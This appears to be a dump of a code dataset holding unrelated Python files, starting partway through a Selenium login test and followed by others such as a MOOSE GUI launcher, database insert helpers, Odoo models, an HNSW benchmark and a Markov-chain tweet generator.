driver.find_element_by_xpath("//div[@id='bottom_qlogin']//a[@id='switcher_plogin']").click()
driver.find_element_by_xpath("//div[@class='inputOuter']/input[@id='p']").send_keys(qq_passwd)
driver.find_element_by_xpath("//div[@class='inputOuter']/input[@id='u']").send_keys(qq)
driver.implicitly_wait(3)
driver.find_element_by_xpath("//div[@class='submit']/a/input[@id='login_button']").click()
time.sleep(5)
def test_login_wx():
""" TestCase 02: wx login."""
pass
def test_login_jdpay():
""" TestCase 03: jd wallt login."""
pass
def suite_cpt():
tests = [
"test_login_qq"
]
return unittest.TestSuite(map(TestLoginCooperationAccount,tests))
if __name__ == "__main__":
unittest.TextTestRunner(verbosity=2).run(suite_cpt())
|
986,991 | c7d381ff0c30f1bf2b4a49f19a0b590a3f86395e | # Filename: moosegui.py
# Description: Graphical user interface of MOOSE simulator.
# Author: Subhasis Ray, Harsha Rani, Dilawar Singh
# Maintainer:
# Created: Mon Nov 12 09:38:09 2012 (+0530)
__author__ = 'Subhasis Ray , HarshaRani, Aviral Goel, NCBS Bangalore'
import sys
from PyQt5.QtWidgets import QApplication
from PyQt5 import QtGui, QtCore
from moosegui import config
from moosegui import MWindow as MWindow
app_ = None
def main():
# create the GUI application
global app_
app_ = QApplication(sys.argv)
QtGui.qApp = app_
mWindow = MWindow.MWindow()
mWindow.setWindowState(QtCore.Qt.WindowMaximized)
sys.excepthook = mWindow.handleException
mWindow.show()
sys.exit( app_.exec_() )
if __name__ == '__main__':
main()
|
986,992 | 1eda40ef74f0ecf9bc5ed4a1fdde1f447a7563ef | from .arp_attack import ARPAttack |
986,993 | f31abd0d1de08be566fef071b9e1bf2f43264c7f | class Emp:
def emp1(self,name,age,salary):
self.n = name
self.a = age
self.s = salary
print "name:%r"%self.n + "Age:%r" %self.a + "salary:%r"%self.s
def allowance(self):
self.all = 1000
class Details:
def sala(self):
d = Emp()
d.emp1("name",20,100001)
d.allowance()
if d.s > 10000:
print d.s + d.all
else:
print "have not allowance"
x = Emp()
x.emp1("x",1,2)
x.allowance()
y = Details()
y.sala()
|
986,994 | bc32fbd68527e32d53c4d4ae031ac389482a47ff | from configparser import ConfigParser
import psycopg2
import psycopg2.extras as psql_extras
import pandas as pd
from typing import Dict
def load_connection_info(
ini_filename: str
) -> Dict[str, str]:
parser = ConfigParser()
parser.read(ini_filename)
# Create a dictionary of the variables stored under the "postgresql" section of the .ini
conn_info = {param[0]: param[1] for param in parser.items("postgresql")}
return conn_info
def insert_data(
query: str,
conn: psycopg2.extensions.connection,
cur: psycopg2.extensions.cursor,
df: pd.DataFrame,
page_size: int
) -> None:
data_tuples = [tuple(row.to_numpy()) for index, row in df.iterrows()]
try:
psql_extras.execute_values(
cur, query, data_tuples, page_size=page_size)
print("Query:", cur.query)
except Exception as error:
print(f"{type(error).__name__}: {error}")
print("Query:", cur.query)
conn.rollback()
cur.close()
else:
conn.commit()
if __name__ == "__main__":
# host, database, user, password
conn_info = load_connection_info("db.ini")
# Connect to the "houses" database
connection = psycopg2.connect(**conn_info)
cursor = connection.cursor()
# Insert data into the "house" table
house_df = pd.DataFrame({
"id": [1, 2, 3],
"address": ["Street MGS, 23", "Street JHPB, 44", "Street DS, 76"]
})
house_query = "INSERT INTO house(id, address) VALUES %s"
insert_data(house_query, connection, cursor, house_df, 100)
# Insert data into the "person" table
person_df = pd.DataFrame({
"id": [1, 2, 3, 4],
"name": ["Michael", "Jim", "Pam", "Dwight"],
"house_id": [1, 2, 2, 3]
})
person_query = "INSERT INTO person(id, name, house_id) VALUES %s"
insert_data(person_query, connection, cursor, person_df, 100)
# Close all connections to the database
connection.close()
cursor.close()
|
986,995 | aef6afceaaef81d13dbb3bf5dcc1b3114da7bf55 | import movealgorithm
from .. import board as b
from ..board import Board
from ..squid import Squid
import logging
import copy
class PlacementSubtraction(movealgorithm.MoveAlgorithm):
placementsTemplate = None
def __init__(self, board, squidLengths):
assert isinstance(board, Board), "Invalid parameter type"
assert isinstance(squidLengths, list), "Invalid parameter type"
if PlacementSubtraction.placementsTemplate == None:
PlacementSubtraction.placementsTemplate = PlacementSubtraction.countPlacementsOnBoard(board, squidLengths)
self.placements = copy.deepcopy(PlacementSubtraction.placementsTemplate)
@staticmethod
def countPlacementsOnBoard(board, squidLengths):
placements = []
for y in range(8):
for x in range(8):
pos = (x,y)
for squidLength in squidLengths:
posPlacements = PlacementSubtraction.countPlacementsOnPosition(board, pos, squidLength)
placements += [p for p in posPlacements if not p in placements]
return placements
@staticmethod
def countPlacementsOnPosition(board, (x, y), squidLength):
placements = []
for axis in ["x", "y"]:
for start in range(-squidLength+1, 1):
squid = Squid([])
complete = True
for i in range(squidLength):
if axis == "x":
pos = (x + start + i, y)
else:
pos = (x, y + start + i)
if board.isOutOfBounds(pos) or board.getState(pos) != b.State.EMPTY:
complete = False
break
else:
squid.getPositions().append(pos)
if complete:
placements.append(squid)
return placements
def countRemovablePlacements(self, pos):
count = 0
for squid in self.placements:
if squid.contains(pos):
count += 1
return count
def removePlacements(self, pos):
self.placements = [squid for squid in self.placements if not squid.contains(pos)]
def updateSquidLengths(self, squidLengths):
self.placements = [squid for squid in self.placements if len(squid) in squidLengths]
def placementSubtraction(self, board):
bestMove = None
bestReduction = 0
for y in range(8):
for x in range(8):
pos = (x,y)
if board.getState(pos) == b.State.EMPTY:
reduction = self.countRemovablePlacements(pos)
if reduction > bestReduction:
bestMove = pos
bestReduction = reduction
self.removePlacements(bestMove)
return bestMove
def findNextMove(self, board):
return self.placementSubtraction(board)
|
986,996 | 7a7dffde5776f6b77b66f018f1d0dce731d0f326 | # -*- coding: utf-8 -*-
# See LICENSE file for full copyright and licensing details.
from odoo import models, fields, api
from odoo.exceptions import ValidationError,UserError
class Location(models.Model):
_inherit = "stock.location"
school_id = fields.Many2one('school.school', 'Campus', required=False)
class Picking(models.Model):
_inherit = "stock.picking"
school_id = fields.Many2one('school.school', 'Campus', required=False)
class StockWarehouse(models.Model):
_inherit = "stock.warehouse"
school_id = fields.Many2one('school.school',string="Campus") |
986,997 | 3a9df52fcc1dd9817c07054b9d864d542f125951 | # -*- coding: utf-8 -*-
import pickle
import pprint
import time
import h5py
import numpy as np
from pandas import DataFrame
import sys
sys.path.append('/Users/Ryan/code/python/hnsw-python')
from hnsw import HNSW
fr = open('glove-25-angular-balanced.ind','rb')
hnsw_n = pickle.load(fr)
f = h5py.File('glove-25-angular.hdf5','r')
distances = f['distances']
neighbors = f['neighbors']
test = f['test']
train = f['train']
variance_record = []
mean_record = []
for j in range(20):
print(j)
time_record = []
for index, i in enumerate(test):
search_begin = time.time()
idx = hnsw_n.search(i, 10)
# pprint.pprint(idx)
search_end = time.time()
search_time = search_end - search_begin
time_record.append(search_time * 1000)
variance_n = np.var(time_record)
mean_n = np.mean(time_record)
pprint.pprint('variance: %f' % variance_n)
pprint.pprint('mean: %f' % mean_n)
variance_record.append(variance_n)
mean_record.append(mean_n)
data = {
'mean_balanced': mean_record,
'variance_balanced': variance_record
}
df = DataFrame(data)
df.to_excel('variance_result_balanced_8.xlsx')
|
986,998 | d9253306fea6336be888d364543f2930df2466cb | import random
data = ['shop', 'cup', 'third']
def func_add(tovar):
return tovar + ": "+ str(random.randint(1, len(tovar)))
data_tovars = map(func_add, data)
print(list(data_tovars))
print(data) |
986,999 | 09ad3be9127dc67f399260c5efacfae9faeb814e | import json
import pandas as pd
import nltk
from collections import Counter
from numpy.random import choice
START = "____START____"
END = "____END____"
def sample_from_choices(choices):
words, unnormalized_probs = tuple(zip(*choices.items()))
denom = sum(unnormalized_probs)
probs = [d / denom for d in unnormalized_probs]
return choice(words, p=probs)
def clean_up_tt(tweet):
tweet = tweet.replace("’", "'") # backtick
tweet = tweet.replace("“", '"') # left/right quotes
tweet = tweet.replace("”", '"') # left/right quotes
tweet = tweet.replace("U.S.A.", "USA")
tweet = tweet.replace("U.S.", "US")
tweet = tweet.replace("…", "")
return tweet
def append_token(tweet, token):
if token == END:
return tweet
elif tweet == "":
return token
elif token in "!%,.\'\":)?":
tweet += token
elif tweet[-1] in "$(":
tweet = tweet + token
else:
tweet += (" " + token)
return tweet
def tweet_from_token_list(token_list):
tweet = ""
for token in token_list:
if token not in (START, END):
tweet = append_token(tweet, token)
return tweet
class MCTweet(list):
def __init__(self, start=START):
self.append(start)
def current_ngram(self, n):
if n == 1:
return self[-1]
return tuple(self[-n:])
def __len__(self):
return len(self.formatted)
@property
def formatted(self):
return tweet_from_token_list(self)
class MCCorpus:
def __init__(self, n=3):
self.n = n
self.backoff_cutoff = n
self.tokenizer = nltk.tokenize.TweetTokenizer()
self.onegrams = dict()
self.twograms = dict()
self.threegrams = dict()
self.exclusion = "\"()"
self.filter_out_url = True
def filter_words(self, words):
words = [w for w in words if w not in self.exclusion]
if self.filter_out_url:
words = [w for w in words if "https" not in w]
# replacements. This is ugly and hacky, fix in a later version.
for j, word in enumerate(words):
if word == 'USA':
words[j] = 'U.S.A.'
if word == 'US':
words[j] = 'U.S.'
return words
def fit(self, text_list):
for tweet in text_list:
text = clean_up_tt(tweet)
words = [START] + self.tokenizer.tokenize(text) + [END]
words = self.filter_words(words)
for word, nextword in zip(words, words[1:]):
if word not in self.onegrams:
self.onegrams[word] = Counter()
self.onegrams[word][nextword] += 1
for word0, word1, nextword in zip(words, words[1:], words[2:]):
if (word0, word1) not in self.twograms:
self.twograms[(word0, word1)] = Counter()
self.twograms[(word0, word1)][nextword] += 1
for word0, word1, word2, nextword in zip(words, words[1:], words[2:], words[3:]):
if (word0, word1, word2) not in self.threegrams:
self.threegrams[(word0, word1, word2)] = Counter()
self.threegrams[(word0, word1, word2)][nextword] += 1
def predict(self, seed=START, limit_length=280):
tweet = MCTweet(seed)
while tweet.current_ngram(1) != END:
if (tweet.current_ngram(3) in self.threegrams) and (
len(self.threegrams[tweet.current_ngram(3)]) >= self.backoff_cutoff):
tweet.append(sample_from_choices(self.threegrams[tweet.current_ngram(3)]))
elif (tweet.current_ngram(2) in self.twograms) and (len(self.twograms[tweet.current_ngram(2)]) >= self.backoff_cutoff):
tweet.append(sample_from_choices(self.twograms[tweet.current_ngram(2)]))
else:
tweet.append(sample_from_choices(self.onegrams[tweet.current_ngram(1)]))
if len(tweet) > limit_length:
tweet = MCTweet(seed)
return tweet
if __name__ == '__main__':
with open("tweets.json", encoding="utf8") as f:
td = json.load(f)
tweettext = [t['text'] for t in td[-250:]]
corpus = MCCorpus(2)
corpus.fit(tweettext)
for i in range(20):
tweet = corpus.predict()
while tweet[1] in ["...", ".", "$", "\"", "'"]:
tweet = corpus.predict()
print("TWEET: (len=%i)" % len(tweet))
print(tweet.formatted)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.